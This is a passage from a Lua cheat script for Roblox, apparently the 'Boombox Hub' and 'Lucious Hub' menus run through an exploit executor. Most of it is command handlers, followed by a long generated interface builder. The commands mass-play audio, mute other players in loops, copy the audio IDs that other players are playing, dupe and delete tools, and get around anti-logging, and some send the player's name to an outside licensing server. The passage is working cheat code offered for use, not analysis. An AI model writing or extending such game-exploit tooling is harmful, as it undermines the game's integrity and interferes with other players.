Mode = RArg; Color = tostring(Default); })) end) G['Sensitivity'], G['TiltSensitivity'], G['OffsetSensitivity'], G['OffsetTiltSensitivity'], G['Speed'], G['MassPlayLimit'] = 65, 90, 5, -20, 1, 8 C[#C+1] = Sectors['Settings']['Color-Picker'].TextBox['FocusLost']:Connect(function(Enter) if Enter then Default = Color3.fromRGB(unpack(Sectors['Settings']['Color-Picker'].TextBox['Text']:gsub('%s',''):split(','))) for K,V in next, CBackground do Tween(V,.3,'Quint','InOut',{BackgroundColor3 = Default}) end for K,V in next, CImage do Tween(V,.3,'Quint','InOut',{ImageColor3 = Default}) end for K,V in next, CText do Tween(V,.3,'Quint','InOut',{TextColor3 = Default}) end for K,V in next, CScroll do Tween(V,.3,'Quint','InOut',{ScrollBarImageColor3 = Default}) end writefile('Boombox-Hub-Settings.dat', JSONEncode({ Type = RButton['Name']; Mode = RArg; Color = tostring(Default); })) end end) C[#C+1] = Sectors['Settings']['Custom-Message'].TextBox['FocusLost']:Connect(function(Enter) if Enter then writefile('Boombox-Hub-Custom-Message.txt', Sectors['Settings']['Custom-Message'].TextBox['Text']) end end) local PSettings = { Sensitivity = {Scripts['Sensitivity'].TextBox, 65}; OffsetSensitivity = {Scripts['Sensitivity-Offset'].TextBox, 5}; MassPlayLimit = {Scripts['MassPlay-Amount'].TextBox, 8}; TiltSensitivity = {Scripts['TiltSensitivity'].TextBox, 90}; OffsetTiltSensitivity = {Scripts['TiltSensitivity-Offset'].TextBox, -20}; Speed = {Scripts['Rotation-Speed'].TextBox, 1}; } local Numerics = { AntiLog['Asset-Id'].TextBox; Scripts['Asset-Id'].TextBox; Scripts['Dupe-Amount'].TextBox; Scripts['Time-Position'].TextBox; } for K,V in next, Numerics do C[#C+1] = V['Changed']:Connect(function(Property) if Property == 'Text' then V['Text'] = V['Text']:gsub('[^-%.%d+]','') end end) end for K,V in next, PSettings do C[#C+1] = V[1]['Changed']:Connect(function(Property) if Property == 'Text' then V[1]['Text'] = V[1]['Text']:gsub('[^-%.%d+]','') end G[K] = tonumber(V[1]['Text']) or V[2] end) end C[#C+1] = Decoder['Asset-Id'].TextBox.Changed:Connect(function(Property) if Property == 'Text' then if Decoder['Asset-Id'].TextBox.Text:len() > 16383 then Notify('Asset-Id exceeded maximum TextBox length, create a file in your workspace folder and type the file\'s path into the TextBox and use Decode File instead.',10) end end end) local Minimized, SLocation = false local MToggle = function() Minimized = not Minimized if Minimized then SLocation = Main['Position'] end Tween(Main,.4,'Quad','InOut',{Position = Minimized and Origin or SLocation}) Control['Minimize'].Text = Minimized and '+' or '-' end local Exit = function() for I = 1,#C do local V = C[I] V:Disconnect() end NK = nil UI:Destroy(); Notification:Destroy(); Template:Destroy(); Push:Destroy() end local Prefix = ';' local LP = game:GetService('Players')['LocalPlayer'] local GPlayer = function(Name) Name = Name:lower() local Matches = {}; for I = #Name,1,-1 do for K,V in next, game:GetService('Players'):GetPlayers() do if rawequal(Name,V['Name']:lower():sub(1,I)) then table.insert(Matches,V) end end end if #Matches > 0 then return Matches[1] else for K,V in next, game:GetService('Players'):GetPlayers() do if V['Name']:lower():find(Name) then return V end end end end local PPlayer, PChar; local SetTargetInfo = function(Name) PPlayer = GPlayer(Name); PChar = PPlayer['Character'] end local Commands, CommandsInfo = {}, {} local AddCommand = function(Name, Info, Func) Commands[Name] = Func CommandsInfo[Name] = Info end AddCommand('massplay', 'Mass plays all your radios through your character.', function(...) local Args, ID = {...}, nil; ID = Args[1] if not RL then return end if RFE then Notify('Error: RFE is enabled on this game.',4); return end local AssetId = Encode(ID) if AssetId == nil then RL = true; return end LP['Character'].Humanoid:UnequipTools() local FoundRadios = {}; (function() local Tools = LP['Backpack']:GetChildren() for _, Tool in next, Tools do if string.find(Tool.Name:lower(), 'boombox') then table.insert(FoundRadios, Tool) Tool['Parent'] = LP['Character'] end end end)(); if #FoundRadios < 1 then Notify('Error: User doesn\'t have a boombox.'); RL = true; return end local Tool = FoundRadios[1] if not pcall(function() for _, Boombox in next, FoundRadios do Boombox:FindFirstChildOfClass('RemoteEvent'):FireServer(RArg, AssetId) end local Selected = nil repeat local T = Tool:GetDescendants() for I = 1,#T do local V = T[I] if V:IsA('Sound') then if V['Playing'] and V['TimeLength'] ~= 0 and V['IsLoaded'] then Selected = V end end end wait(.06) until Selected local Time = Selected.TimePosition for K,V in next, LP['Character']:GetDescendants() do if V:IsA('Sound') then V['TimePosition'] = math.round(Time) - .5 end end end) then Notify('Error: Boombox is not compatible, check the Settings tab.',7); RL = true; return end if pcall(function() Playing = game:GetService('MarketplaceService'):GetProductInfo(ID)['Name'] end) then RL = true; Notify(('Play: Attempting to massplay-play %s under boombox settings: "%s"'):format(Playing, RButton['Name'] or 'Standard'),7) else RL = true; Notify('Error: Invalid id given.',4) end end) AddCommand('follow', 'Takes parameter , makes your visualizer follow the specified player. If no name given, follows self again.', function(Name) Name = Name or LP['Name'] if not LP['Character'] then return; end SetTargetInfo(Name) local SChar = PChar local NRoot = SChar:FindFirstChild('HumanoidRootPart') or SChar:FindFirstChild('Torso') or SChar:FindFirstChild('UpperTorso') or LP['Character']:FindFirstChild('HumanoidRootPart') or LP['Character']:FindFirstChild('Torso') or LP['Character']:FindFirstChild('UpperTorso') if NRoot then G['Root'] = NRoot end end) AddCommand('input','Takes parameter , is used for certain presets.',function(...) local TBL={...}local Table = Request({ Url='https://riptxde.dev/index.php'; Method='GET'; })['Body'] if Table ~= '{CFrame.new()}' then return 'Incompatible Exploit' end G['Input']=table.concat(TBL,' ') end) AddCommand('canceldupe', 'Stops duping tools and re-grabs them after respawning.', function() CancelDupe = true end) AddCommand('experimentalmode', 'Allows the visualizer to error, making it easier while creating presets.', function() G['ExperimentalMode'] = true end) AddCommand('nodefault', 'Disables the annoying black gui when you click with the default boomboxes.', function() if not (LP['Character'] and LP['Character']:FindFirstChildOfClass('Humanoid')) then return; end LP['Character']:FindFirstChildOfClass('Humanoid'):UnequipTools() for K,V in next, LP['Backpack']:GetChildren() do if V:IsA('Tool') then if V:FindFirstChild('Client') then V['Client'].Disabled = true end end end end) AddCommand('demesh', 'Unequips all tools and removes their meshes.', function() if not LP['Character'] then return; end for K,V in next, LP['Backpack']:GetChildren() do if V:IsA('Tool') then V['Parent'] = LP['Character'] end end game:GetService('RunService')['Heartbeat']:Wait() for A,B in next, LP['Character']:GetChildren() do if B:IsA('Tool') then for C,D in next, B:GetDescendants() do if D:IsA('Mesh') or D:IsA('SpecialMesh') then D:Destroy() end end end end end) AddCommand('deletetool', 'Deletes all tools with the same name as the one you are holding.', function() if not (LP['Character'] and LP['Character']:FindFirstChildOfClass('Tool') and LP['Character']:FindFirstChildOfClass('Humanoid')) then Notify('Error: You must be holding the tool you want to delete.',4) return; end local Name = LP['Character']:FindFirstChildOfClass('Tool')['Name'] LP['Character']:FindFirstChildOfClass('Humanoid'):UnequipTools() for K,V in next, LP['Backpack']:GetChildren() do if V:IsA('Tool') and V['Name'] == Name then V:Destroy() end end end) AddCommand('sync', 'Takes parameter , Syncs all boomboxes to time in seconds. If time not given, syncs to the time of one of your playing boomboxes.', function(Time) if not RFE then if not LP['Character'] then return; end for K,V in next, LP['Character']:GetDescendants() do if V:IsA('Sound') and V.IsLoaded and V['Playing'] then if V['Parent'] and V['Parent'].Name == 'HumanoidRootPart' then continue; end if not Time then Time = V['TimePosition'] end break; end end for K,V in next, LP['Character']:GetDescendants() do if V:IsA('Sound') then V['TimePosition'] = math.round(Time) - .5 end end else Notify('Error: RFE is enabled on this game.',4) end end) AddCommand('unimport', 'Takes parameter , removes specified preset.', function(PresetName) PresetName = (PresetName or ''):gsub('.preset',''):lower() if PresetName == 'circle' or PresetName == 'line' then Notify('Error: That preset cannot be deleted!',6) return; end if not pcall(function() local TPreset = JSONDecode(readfile('Boombox-Hub-Presets.dat')) assert(TPreset[PresetName]) TPreset[PresetName] = nil Presets[PresetName] = nil local Button = Scripts['Preset']:FindFirstChild(PresetName) if Button then if type(getconnections) == 'function' then local T = getconnections(Button['MouseButton1Click']); for I = 1,#T do local V = T[I] V:Disable() end end coroutine.wrap(function() Tween(Button,.2,'Quad','Out',{TextTransparency = 1}) Tween(Button['Frame'],.2,'Quad','Out',{ImageTransparency = 1}) wait(.2) Button:Destroy() end)() Tween(Scripts['Preset'],.2,'Quad','InOut',{CanvasSize = UDim2.new(0,0,0,Scripts['Preset'].UIListLayout['AbsoluteContentSize'].Y * 2)}) end writefile('Boombox-Hub-Presets.dat', JSONEncode(TPreset)) CPreset = Presets['circle'] for K,V in next, Scripts['Preset']:GetChildren() do if not (V:IsA('UIListLayout') or V:IsA('UIPadding')) then Tween(V['Frame'],.2,'Quad','Out',{ImageColor3 = PTemplate['Frame'].ImageColor3}) end end Notify(('Successfully removed preset "%s".'):format(PresetName),6) wait(.4) end) then Notify(('Error: Could not find a preset named "%s".'):format(PresetName),6) end end) AddCommand('import', 'Takes parameter , imports specified preset file. See #visualizer-info for more instructions.', function(FileName) local File; if not pcall(function() if not pcall(function() File = readfile(FileName) end) then File = readfile(FileName..'.preset') end assert(File ~= nil) FileName = FileName:gsub('%.preset','') end) then Notify('Error: Preset file not found in Synapse X/workspace.',4) return end if FileName == 'circle' or FileName == 'line' then Notify('Error: That preset cannot be overwritten!',6) return; end if Scripts['Preset']:FindFirstChild(FileName) then Commands.unimport(FileName) end local TPreset = JSONDecode(readfile('Boombox-Hub-Presets.dat')) TPreset[FileName] = File writefile('Boombox-Hub-Presets.dat', JSONEncode(TPreset)) Presets[FileName] = File local Clone = PTemplate:Clone() Clone['Text'] = FileName Clone['Name'] = FileName AddFunc('Presets',Clone,function() CPreset = File end) Clone['TextTransparency'] = 1 Clone['Frame'].ImageTransparency = 1 Clone['Parent'] = Scripts['Preset'] Tween(Clone,.2,'Quad','Out',{TextTransparency = 0}) Tween(Clone['Frame'],.2,'Quad','Out',{ImageTransparency = 0}) Tween(Scripts['Preset'],.2,'Quad','InOut',{CanvasSize = UDim2.new(0,0,0,Scripts['Preset'].UIListLayout['AbsoluteContentSize'].Y * 2)}) CPreset = Presets['circle'] for K,V in next, Scripts['Preset']:GetChildren() do if not (V:IsA('UIListLayout') or V:IsA('UIPadding')) then Tween(V['Frame'],.2,'Quad','Out',{ImageColor3 = PTemplate['Frame'].ImageColor3}) end end Notify(('Successfully imported preset "%s".'):format(FileName),6) end) AddCommand('log', 'Takes parameter , copies the asset-id of an audio that the specified player is playing.', function(Name) SetTargetInfo(Name) local SPlayer, SChar = PPlayer, PChar if SChar then local Sounds, Boombox = {}; for A,B in next, SChar:GetChildren() do if B['Name']:lower():find('boombox') or B['Name']:lower():find('radio') then for C,D in next, B:GetDescendants() do if D:IsA('Sound') then if D['Playing'] ~= false and D['IsLoaded'] ~= false then Boombox = B; Sounds[#Sounds+1] = D; break end end end end end if Boombox == nil then for A,B in next, SPlayer['Backpack']:GetChildren() do if B['Name']:lower():find('boombox') or B['Name']:lower():find('radio') then for C,D in next, B:GetDescendants() do if D:IsA('Sound') then if D['Playing'] ~= false and D['IsLoaded'] ~= false then Boombox = B; Sounds[#Sounds+1] = D; break end end end end end end if #Sounds < 1 then Notify('Error: Could not find '..SPlayer['Name']..'\'s boombox.',4); return end local Sound = {nil,-1}; for K,V in next, Sounds do if V['PlaybackLoudness'] > Sound[2] then Sound[1] = V; Sound[2] = V['PlaybackLoudness'] end end everyClipboard(Sound[1].SoundId); Notify('Successfully logged '..SPlayer['Name']..'\'s boombox.',4) end end) AddCommand('mute', 'Takes parameter , mutes audio of specified player.', function(Name) if not RFE then SetTargetInfo(Name) local SChar = PChar for K,V in next, SChar:GetDescendants() do if V:IsA('Sound') then V:Stop() end end else Notify('Error: RFE is enabled on this game.',4) end end) AddCommand('muteall', 'Mutes all players.', function() if not RFE then for A,B in next, game:GetService('Players'):GetPlayers() do if B ~= LP then local BChar = B['Character'] if BChar then for C,D in next, BChar:GetDescendants() do if D:IsA('Sound') then D:Stop() end end end end end else Notify('Error: RFE is enabled on this game.',4) end end) local Muted = {}; AddCommand('loopmute', 'Takes parameter , constantly mutes audio of specified player.', function(Name) if not RFE then SetTargetInfo(Name) local Selected = PPlayer table.insert(Muted,Selected) repeat coroutine.wrap(function() Commands.mute(Selected['Name']) end)() wait(.08) until not table.find(Muted,Selected) else Notify('Error: RFE is enabled on this game.',4) end end) AddCommand('unloopmute', 'Takes parameter , stops constantly muting audio of specified player.', function(Name) SetTargetInfo(Name) local Selected = PPlayer for K,V in next, Muted do if V == Selected then Muted[K] = nil end end end) local Looping = false AddCommand('loopmuteall', 'Constantly mutes all players.', function() Looping = true coroutine.resume(coroutine.create(function() repeat Commands.muteall() wait(.08) until Looping == false end)) end) AddCommand('unloopmuteall', 'Stops constantly muting all players.', function() Looping = false end) AddCommand('verify', 'Takes parameter , Lets you verify via email to use the paid features on a different IP. See #my-ip-changed for more information.', function(Code) local Response = Request({ Url = 'https://riptxde.dev/auth.php/?verification-code='..Code..'&lp='..LP['Name']; Method = 'GET'; })['Body'] Notify(Response,10); end) local CommandsContainer = Main['Commands'] local CommandsList = CommandsContainer['Commands-List'] local CTemplate = CommandsList['Command']; CTemplate['Parent'] = game:GetService('CorePackages') for K,V in next, CommandsInfo do local Clone = CTemplate:Clone() Clone['Text'] = Prefix..K AddFunc('Commands', Clone, function() Notify(V, 6) end) Clone['Name'] = K Clone['Parent'] = CommandsList end local Parse = function(Msg) if Msg:sub(1,1) ~= Prefix then Msg = Prefix..Msg end Msg = Msg:lower() if Msg:match('^'..Prefix) then local Args = {}; for V in Msg:gmatch('[^%s]+') do table.insert(Args,V) end local Func = Commands[Args[1]:gsub(Prefix,'',1)]; table.remove(Args,1) if Func then coroutine.wrap(function() Func(table.unpack(Args)) end)() end end end C[#C+1] = Control['Close'].MouseButton1Click:Connect(Exit) C[#C+1] = Control['Minimize'].MouseButton1Click:Connect(MToggle) C[#C+1] = Menu['Command-Bar'].TextBox['FocusLost']:Connect(function(Enter) if Enter then Parse(Menu['Command-Bar'].TextBox['Text']) pcall(function() Menu['Command-Bar'].TextBox['Text'] = '' end) end end) end }) Main:AddButton({ Title = "FE Lucious Hub", Description = "for boomboxes", Callback = function() _G.target = game:GetService("Players").LocalPlayer.Name local plr = game:GetService("Players").LocalPlayer local charr = game:GetService("Players").LocalPlayer.Character local players = game:GetService("Players"):GetPlayers() local Player = game:GetService("Players").LocalPlayer local Char = Player.Character local pg = true local LogPlay = false local Ignore = {"rbxasset://sounds/action_footsteps_plastic.mp3", "rbxasset://sounds/impact_water.mp3", "rbxasset://sounds/uuhhh.mp3", "rbxasset://sounds/action_swim.mp3", "rbxasset://sounds/action_get_up.mp3", "rbxasset://sounds/action_falling.mp3", "rbxasset://sounds/action_jump.mp3", "rbxasset://sounds/action_jump_land.mp3"} local Tween = function(Obj, Time, Style, Direction, Table) game:GetService("TweenService"):Create(Obj, TweenInfo.new(Time, Enum.EasingStyle[Style], Enum.EasingDirection[Direction], 0, false, 0), Table):Play() end local UI = Instance.new("ScreenGui") local Main = Instance.new("Frame") local UICorner = Instance.new("UICorner") local Bar = Instance.new("Frame") local UICorner_2 = Instance.new("UICorner") local TextLabel = Instance.new("TextLabel") local TextLabel_2 = Instance.new("TextLabel") local LineEffect = Instance.new("Frame") local UICorner_3 = Instance.new("UICorner") local Line1 = Instance.new("ImageLabel") local Home = Instance.new("TextButton") local HomeIcon = Instance.new("ImageLabel") local UIAspectRatioConstraint = Instance.new("UIAspectRatioConstraint") local Line2 = Instance.new("ImageLabel") local Visualizer = Instance.new("TextButton") local VisIcon = Instance.new("ImageLabel") local UIAspectRatioConstraint_2 = Instance.new("UIAspectRatioConstraint") local Line3 = Instance.new("ImageLabel") local LoggerIcon = Instance.new("ImageLabel") local UIAspectRatioConstraint_3 = Instance.new("UIAspectRatioConstraint") local logger = Instance.new("TextButton") local Line4 = Instance.new("ImageLabel") local SettingsIcon = Instance.new("ImageLabel") local UIAspectRatioConstraint_4 = Instance.new("UIAspectRatioConstraint") local Settings = Instance.new("TextButton") local Profile = Instance.new("ImageLabel") local plricon = Instance.new("ImageLabel") local Corner = Instance.new("UICorner") local Name = Instance.new("TextLabel") local Frames = Instance.new("Frame") local UICorner_4 = Instance.new("UICorner") local Frame1 = Instance.new("Frame") local UICorner_5 = Instance.new("UICorner") local TextLabel_3 = Instance.new("TextLabel") local TextLabel_4 = Instance.new("TextLabel") local TextLabel_5 = Instance.new("TextLabel") local TextLabel_6 = Instance.new("TextLabel") local TextLabel_7 = Instance.new("TextLabel") local TextLabel_8 = Instance.new("TextLabel") local TextLabel_9 = Instance.new("TextLabel") local TextLabel_10 = Instance.new("TextLabel") local ImageLabel = Instance.new("ImageLabel") local TextLabel_11 = Instance.new("TextLabel") local Frame2 = Instance.new("Frame") local AudioId = Instance.new("TextBox") local UICorner_6 = Instance.new("UICorner") local UICorner_7 = Instance.new("UICorner") local Distance = Instance.new("TextBox") local UICorner_8 = Instance.new("UICorner") local Visualizee = Instance.new("TextButton") local UICorner_9 = Instance.new("UICorner") local Sync = Instance.new("TextButton") local UICorner_10 = Instance.new("UICorner") local TpInput = Instance.new("TextBox") local UICorner_11 = Instance.new("UICorner") local WavesOn = Instance.new("TextButton") local UICorner_12 = Instance.new("UICorner") local TextLabel_12 = Instance.new("TextLabel") local PresetScroll = Instance.new("ScrollingFrame") local MA8 = Instance.new("TextButton") local UICorner_13 = Instance.new("UICorner") local MAZ = Instance.new("TextButton") local UICorner_14 = Instance.new("UICorner") local MAX = Instance.new("TextButton") local UICorner_15 = Instance.new("UICorner") local MAY = Instance.new("TextButton") local UICorner_16 = Instance.new("UICorner") local Anglesscrol = Instance.new("ScrollingFrame") local WAUP = Instance.new("TextButton") local UICorner_17 = Instance.new("UICorner") local WAX = Instance.new("TextButton") local UICorner_18 = Instance.new("UICorner") local WAZ = Instance.new("TextButton") local UICorner_19 = Instance.new("UICorner") local WAY = Instance.new("TextButton") local UICorner_20 = Instance.new("UICorner") local TextLabel_13 = Instance.new("TextLabel") local TextLabel_14 = Instance.new("TextLabel") local Dupe = Instance.new("TextButton") local UICorner_21 = Instance.new("UICorner") local WaveCount = Instance.new("TextBox") local UICorner_22 = Instance.new("UICorner") local target = Instance.new("TextBox") local UICorner_23 = Instance.new("UICorner") local massplay = Instance.new("TextButton") local UICorner_24 = Instance.new("UICorner") local Responsiveness = Instance.new("TextBox") local UICorner_25 = Instance.new("UICorner") local WaveInt = Instance.new("TextBox") local UICorner_26 = Instance.new("UICorner") local Bass = Instance.new("TextBox") local UICorner_27 = Instance.new("UICorner") local Speed = Instance.new("TextBox") local UICorner_28 = Instance.new("UICorner") local Amount = Instance.new("TextBox") local UICorner_29 = Instance.new("UICorner") local LogFrame = Instance.new("Frame") local AudioLogs = Instance.new("ScrollingFrame") local UICorner_30 = Instance.new("UICorner") local UIListLayout = Instance.new("UIListLayout") local Layout = Instance.new("Frame") local WorkspaceL = Instance.new("TextButton") local Corner_2 = Instance.new("UICorner") local GameL = Instance.new("TextButton") local Corner_3 = Instance.new("UICorner") local Copy = Instance.new("TextButton") local Corner_4 = Instance.new("UICorner") local Play = Instance.new("TextButton") local Corner_5 = Instance.new("UICorner") local Holder = Instance.new("Frame") local AudioFrame = Instance.new("Frame") local Corner_6 = Instance.new("UICorner") local AudioID = Instance.new("TextLabel") local AudioName = Instance.new("TextLabel") local Select = Instance.new("TextButton") local Corner_7 = Instance.new("UICorner") local UICorner_31 = Instance.new("UICorner") local Frame3 = Instance.new("Frame") local StealTools = Instance.new("Frame") local UICorner_32 = Instance.new("UICorner") local TextBox = Instance.new("TextButton") local UICorner_33 = Instance.new("UICorner") local TextLabel_15 = Instance.new("TextLabel") local Antilog = Instance.new("TextBox") local UICorner_34 = Instance.new("UICorner") local TextLabel_16 = Instance.new("TextLabel") local UICorner_35 = Instance.new("UICorner") local CmdBar = Instance.new("TextBox") local Corner_8 = Instance.new("UICorner") local CommandsFrame = Instance.new("Frame") local UICorner_36 = Instance.new("UICorner") local TextLabel_17 = Instance.new("TextLabel") local TextLabel_18 = Instance.new("TextLabel") local TextLabel_19 = Instance.new("TextLabel") local TextLabel_20 = Instance.new("TextLabel") local TextLabel_21 = Instance.new("TextLabel") local TextLabel_22 = Instance.new("TextLabel") local TextLabel_23 = Instance.new("TextLabel") local TextLabel_24 = Instance.new("TextLabel") local TextLabel_25 = Instance.new("TextLabel") local Notification = Instance.new("ScreenGui") local MainFrame = Instance.new("ImageLabel") local TextBox_2 = Instance.new("TextBox") local UITextSizeConstraint = Instance.new("UITextSizeConstraint") local Frame = Instance.new("Frame") local UICorner_37 = Instance.new("UICorner") local TextLabel_26 = Instance.new("TextLabel") local ImageLabel_2 = Instance.new("ImageLabel") local UICorner_38 = Instance.new("UICorner") --Properties: UI.Name = "UI" UI.Parent = game:GetService("CoreGui") UI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Main.Name = "Main" Main.Parent = UI Main.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Main.Position = UDim2.new(0.229305431, 0, 0.240944877, 0) Main.Size = UDim2.new(0, 569, 0, 329) UICorner.Parent = Main Bar.Name = "Bar" Bar.Parent = Main Bar.BackgroundColor3 = Color3.fromRGB(36, 40, 72) Bar.ClipsDescendants = true Bar.Size = UDim2.new(0, 144, 0, 329) UICorner_2.Parent = Bar TextLabel.Parent = Bar TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.Size = UDim2.new(0, 144, 0, 50) TextLabel.Font = Enum.Font.GothamSemibold TextLabel.Text = "LUCIOUS" TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel.TextSize = 22.000 TextLabel_2.Parent = Bar TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.BackgroundTransparency = 1.000 TextLabel_2.Position = UDim2.new(0, 0, 0.0577507615, 0) TextLabel_2.Size = UDim2.new(0, 144, 0, 50) TextLabel_2.Font = Enum.Font.GothamSemibold TextLabel_2.Text = "WARE" TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) TextLabel_2.TextSize = 22.000 LineEffect.Name = "LineEffect" LineEffect.Parent = Bar LineEffect.BackgroundColor3 = Color3.fromRGB(255, 255, 255) LineEffect.Position = UDim2.new(0.124999993, 0, 0.185410336, 0) LineEffect.Size = UDim2.new(0, 107, 0, 2) UICorner_3.Parent = LineEffect Line1.Name = "Line1" Line1.Parent = Bar Line1.AnchorPoint = Vector2.new(0.5, 0.5) Line1.BackgroundColor3 = Color3.fromRGB(46, 46, 46) Line1.BackgroundTransparency = 1.000 Line1.Position = UDim2.new(0.581515431, 0, 0.325227976, 0) Line1.Size = UDim2.new(1.02414179, 0, 0.121580549, 0) Line1.Image = "rbxassetid://3570695787" Line1.ImageColor3 = Color3.fromRGB(56, 63, 113) Line1.ScaleType = Enum.ScaleType.Slice Line1.SliceCenter = Rect.new(100, 100, 100, 100) Line1.SliceScale = 3.000 Home.Name = "Home" Home.Parent = Bar Home.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Home.BackgroundTransparency = 1.000 Home.Position = UDim2.new(0.125, 0, 0.267477214, 0) Home.Size = UDim2.new(0, 137, 0, 39) Home.Font = Enum.Font.GothamSemibold Home.Text = "Home" Home.TextColor3 = Color3.fromRGB(255, 255, 255) Home.TextSize = 14.000 HomeIcon.Name = "HomeIcon" HomeIcon.Parent = Bar HomeIcon.BackgroundTransparency = 1.000 HomeIcon.Position = UDim2.new(0.112243377, 0, 0.269300938, 0) HomeIcon.Size = UDim2.new(0, 34, 0, 36) HomeIcon.Image = "rbxassetid://7072717697" UIAspectRatioConstraint.Parent = HomeIcon Line2.Name = "Line2" Line2.Parent = Bar Line2.AnchorPoint = Vector2.new(0.5, 0.5) Line2.BackgroundColor3 = Color3.fromRGB(46, 46, 46) Line2.BackgroundTransparency = 1.000 Line2.Position = UDim2.new(1.58200002, 0, 0.467999995, 0) Line2.Size = UDim2.new(1.02400005, 0, 0.122000001, 0) Line2.Image = "rbxassetid://3570695787" Line2.ImageColor3 = Color3.fromRGB(56, 63, 113) Line2.ScaleType = Enum.ScaleType.Slice Line2.SliceCenter = Rect.new(100, 100, 100, 100) Line2.SliceScale = 3.000 Visualizer.Name = "Visualizer" Visualizer.Parent = Bar Visualizer.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Visualizer.BackgroundTransparency = 1.000 Visualizer.Position = UDim2.new(0.125, 0, 0.40729484, 0) Visualizer.Size = UDim2.new(0, 153, 0, 39) Visualizer.Font = Enum.Font.GothamSemibold Visualizer.Text = "Visualizer" Visualizer.TextColor3 = Color3.fromRGB(255, 255, 255) Visualizer.TextSize = 14.000 VisIcon.Name = "VisIcon" VisIcon.Parent = Bar VisIcon.BackgroundTransparency = 1.000 VisIcon.Position = UDim2.new(0.111111112, 0, 0.416413397, 0) VisIcon.Size = UDim2.new(0, 34, 0, 36) VisIcon.Image = "rbxassetid://7072721039" UIAspectRatioConstraint_2.Parent = VisIcon Line3.Name = "Line3" Line3.Parent = Bar Line3.AnchorPoint = Vector2.new(0.5, 0.5) Line3.BackgroundColor3 = Color3.fromRGB(46, 46, 46) Line3.BackgroundTransparency = 1.000 Line3.Position = UDim2.new(1.58200002, 0, 0.60799998, 0) Line3.Size = UDim2.new(1.02400005, 0, 0.122000001, 0) Line3.Image = "rbxassetid://3570695787" Line3.ImageColor3 = Color3.fromRGB(56, 63, 113) Line3.ScaleType = Enum.ScaleType.Slice Line3.SliceCenter = Rect.new(100, 100, 100, 100) Line3.SliceScale = 3.000 LoggerIcon.Name = "LoggerIcon" LoggerIcon.Parent = Bar LoggerIcon.BackgroundTransparency = 1.000 LoggerIcon.Position = UDim2.new(0.11805556, 0, 0.556231022, 0) LoggerIcon.Size = UDim2.new(0, 34, 0, 36) LoggerIcon.Image = "rbxassetid://7072724897" UIAspectRatioConstraint_3.Parent = LoggerIcon logger.Name = "logger" logger.Parent = Bar logger.BackgroundColor3 = Color3.fromRGB(255, 255, 255) logger.BackgroundTransparency = 1.000 logger.Position = UDim2.new(0.125, 0, 0.547112465, 0) logger.Size = UDim2.new(0, 153, 0, 39) logger.Font = Enum.Font.GothamSemibold logger.Text = "Logger" logger.TextColor3 = Color3.fromRGB(255, 255, 255) logger.TextSize = 14.000 Line4.Name = "Line4" Line4.Parent = Bar Line4.AnchorPoint = Vector2.new(0.5, 0.5) Line4.BackgroundColor3 = Color3.fromRGB(46, 46, 46) Line4.BackgroundTransparency = 1.000 Line4.Position = UDim2.new(1.58200002, 0, 0.754000008, 0) Line4.Size = UDim2.new(1.02400005, 0, 0.122000001, 0) Line4.Image = "rbxassetid://3570695787" Line4.ImageColor3 = Color3.fromRGB(56, 63, 113) Line4.ScaleType = Enum.ScaleType.Slice Line4.SliceCenter = Rect.new(100, 100, 100, 100) Line4.SliceScale = 3.000 SettingsIcon.Name = "SettingsIcon" SettingsIcon.Parent = Bar SettingsIcon.BackgroundTransparency = 1.000 SettingsIcon.Position = UDim2.new(0.118055552, 0, 0.702127695, 0) SettingsIcon.Size = UDim2.new(0, 34, 0, 36) SettingsIcon.Image = "rbxassetid://7072721682" UIAspectRatioConstraint_4.Parent = SettingsIcon Settings.Name = "Settings" Settings.Parent = Bar Settings.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Settings.BackgroundTransparency = 1.000 Settings.Position = UDim2.new(0.0972222239, 0, 0.696048617, 0) Settings.Size = UDim2.new(0, 153, 0, 39) Settings.Font = Enum.Font.GothamSemibold Settings.Text = "Settings" Settings.TextColor3 = Color3.fromRGB(255, 255, 255) Settings.TextSize = 14.000 Profile.Name = "Profile" Profile.Parent = Bar Profile.AnchorPoint = Vector2.new(0.5, 0.5) Profile.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Profile.BackgroundTransparency = 1.000 Profile.Position = UDim2.new(0.578043222, 0, 0.911389768, 0) Profile.Size = UDim2.new(1.03108621, 0, 0.110351287, 0) Profile.Image = "rbxassetid://3570695787" Profile.ImageColor3 = Color3.fromRGB(29, 32, 58) Profile.ScaleType = Enum.ScaleType.Slice Profile.SliceCenter = Rect.new(100, 100, 100, 100) Profile.SliceScale = 3.000 plricon.Name = "plricon" plricon.Parent = Profile plricon.AnchorPoint = Vector2.new(0.5, 0.5) plricon.BackgroundColor3 = Color3.fromRGB(63, 70, 127) plricon.Position = UDim2.new(0.134727165, 0, 0.495068759, 0) plricon.Size = UDim2.new(0, 31, 0, 31) plricon.ZIndex = 3 Corner.CornerRadius = UDim.new(0, 100) Corner.Name = "Corner" Corner.Parent = plricon Name.Name = "Name" Name.Parent = Profile Name.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Name.BackgroundTransparency = 1.000 Name.Position = UDim2.new(0.28304854, 0, 0.0130490959, 0) Name.Size = UDim2.new(0, 92, 0, 34) Name.ZIndex = 0 Name.Font = Enum.Font.Gotham Name.Text = "Name" Name.TextColor3 = Color3.fromRGB(255, 255, 255) Name.TextSize = 13.000 Name.TextWrapped = true Name.TextXAlignment = Enum.TextXAlignment.Left Frames.Name = "Frames" Frames.Parent = Main Frames.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Frames.ClipsDescendants = true Frames.Position = UDim2.new(0.25307557, 0, 0, 0) Frames.Size = UDim2.new(0, 425, 0, 329) UICorner_4.Parent = Frames Frame1.Name = "Frame1" Frame1.Parent = Frames Frame1.BackgroundColor3 = Color3.fromRGB(29, 32, 58) Frame1.Position = UDim2.new(-0.000884937937, 0, 0, 0) Frame1.Size = UDim2.new(0, 425, 0, 329) UICorner_5.Parent = Frame1 TextLabel_3.Parent = Frame1 TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) 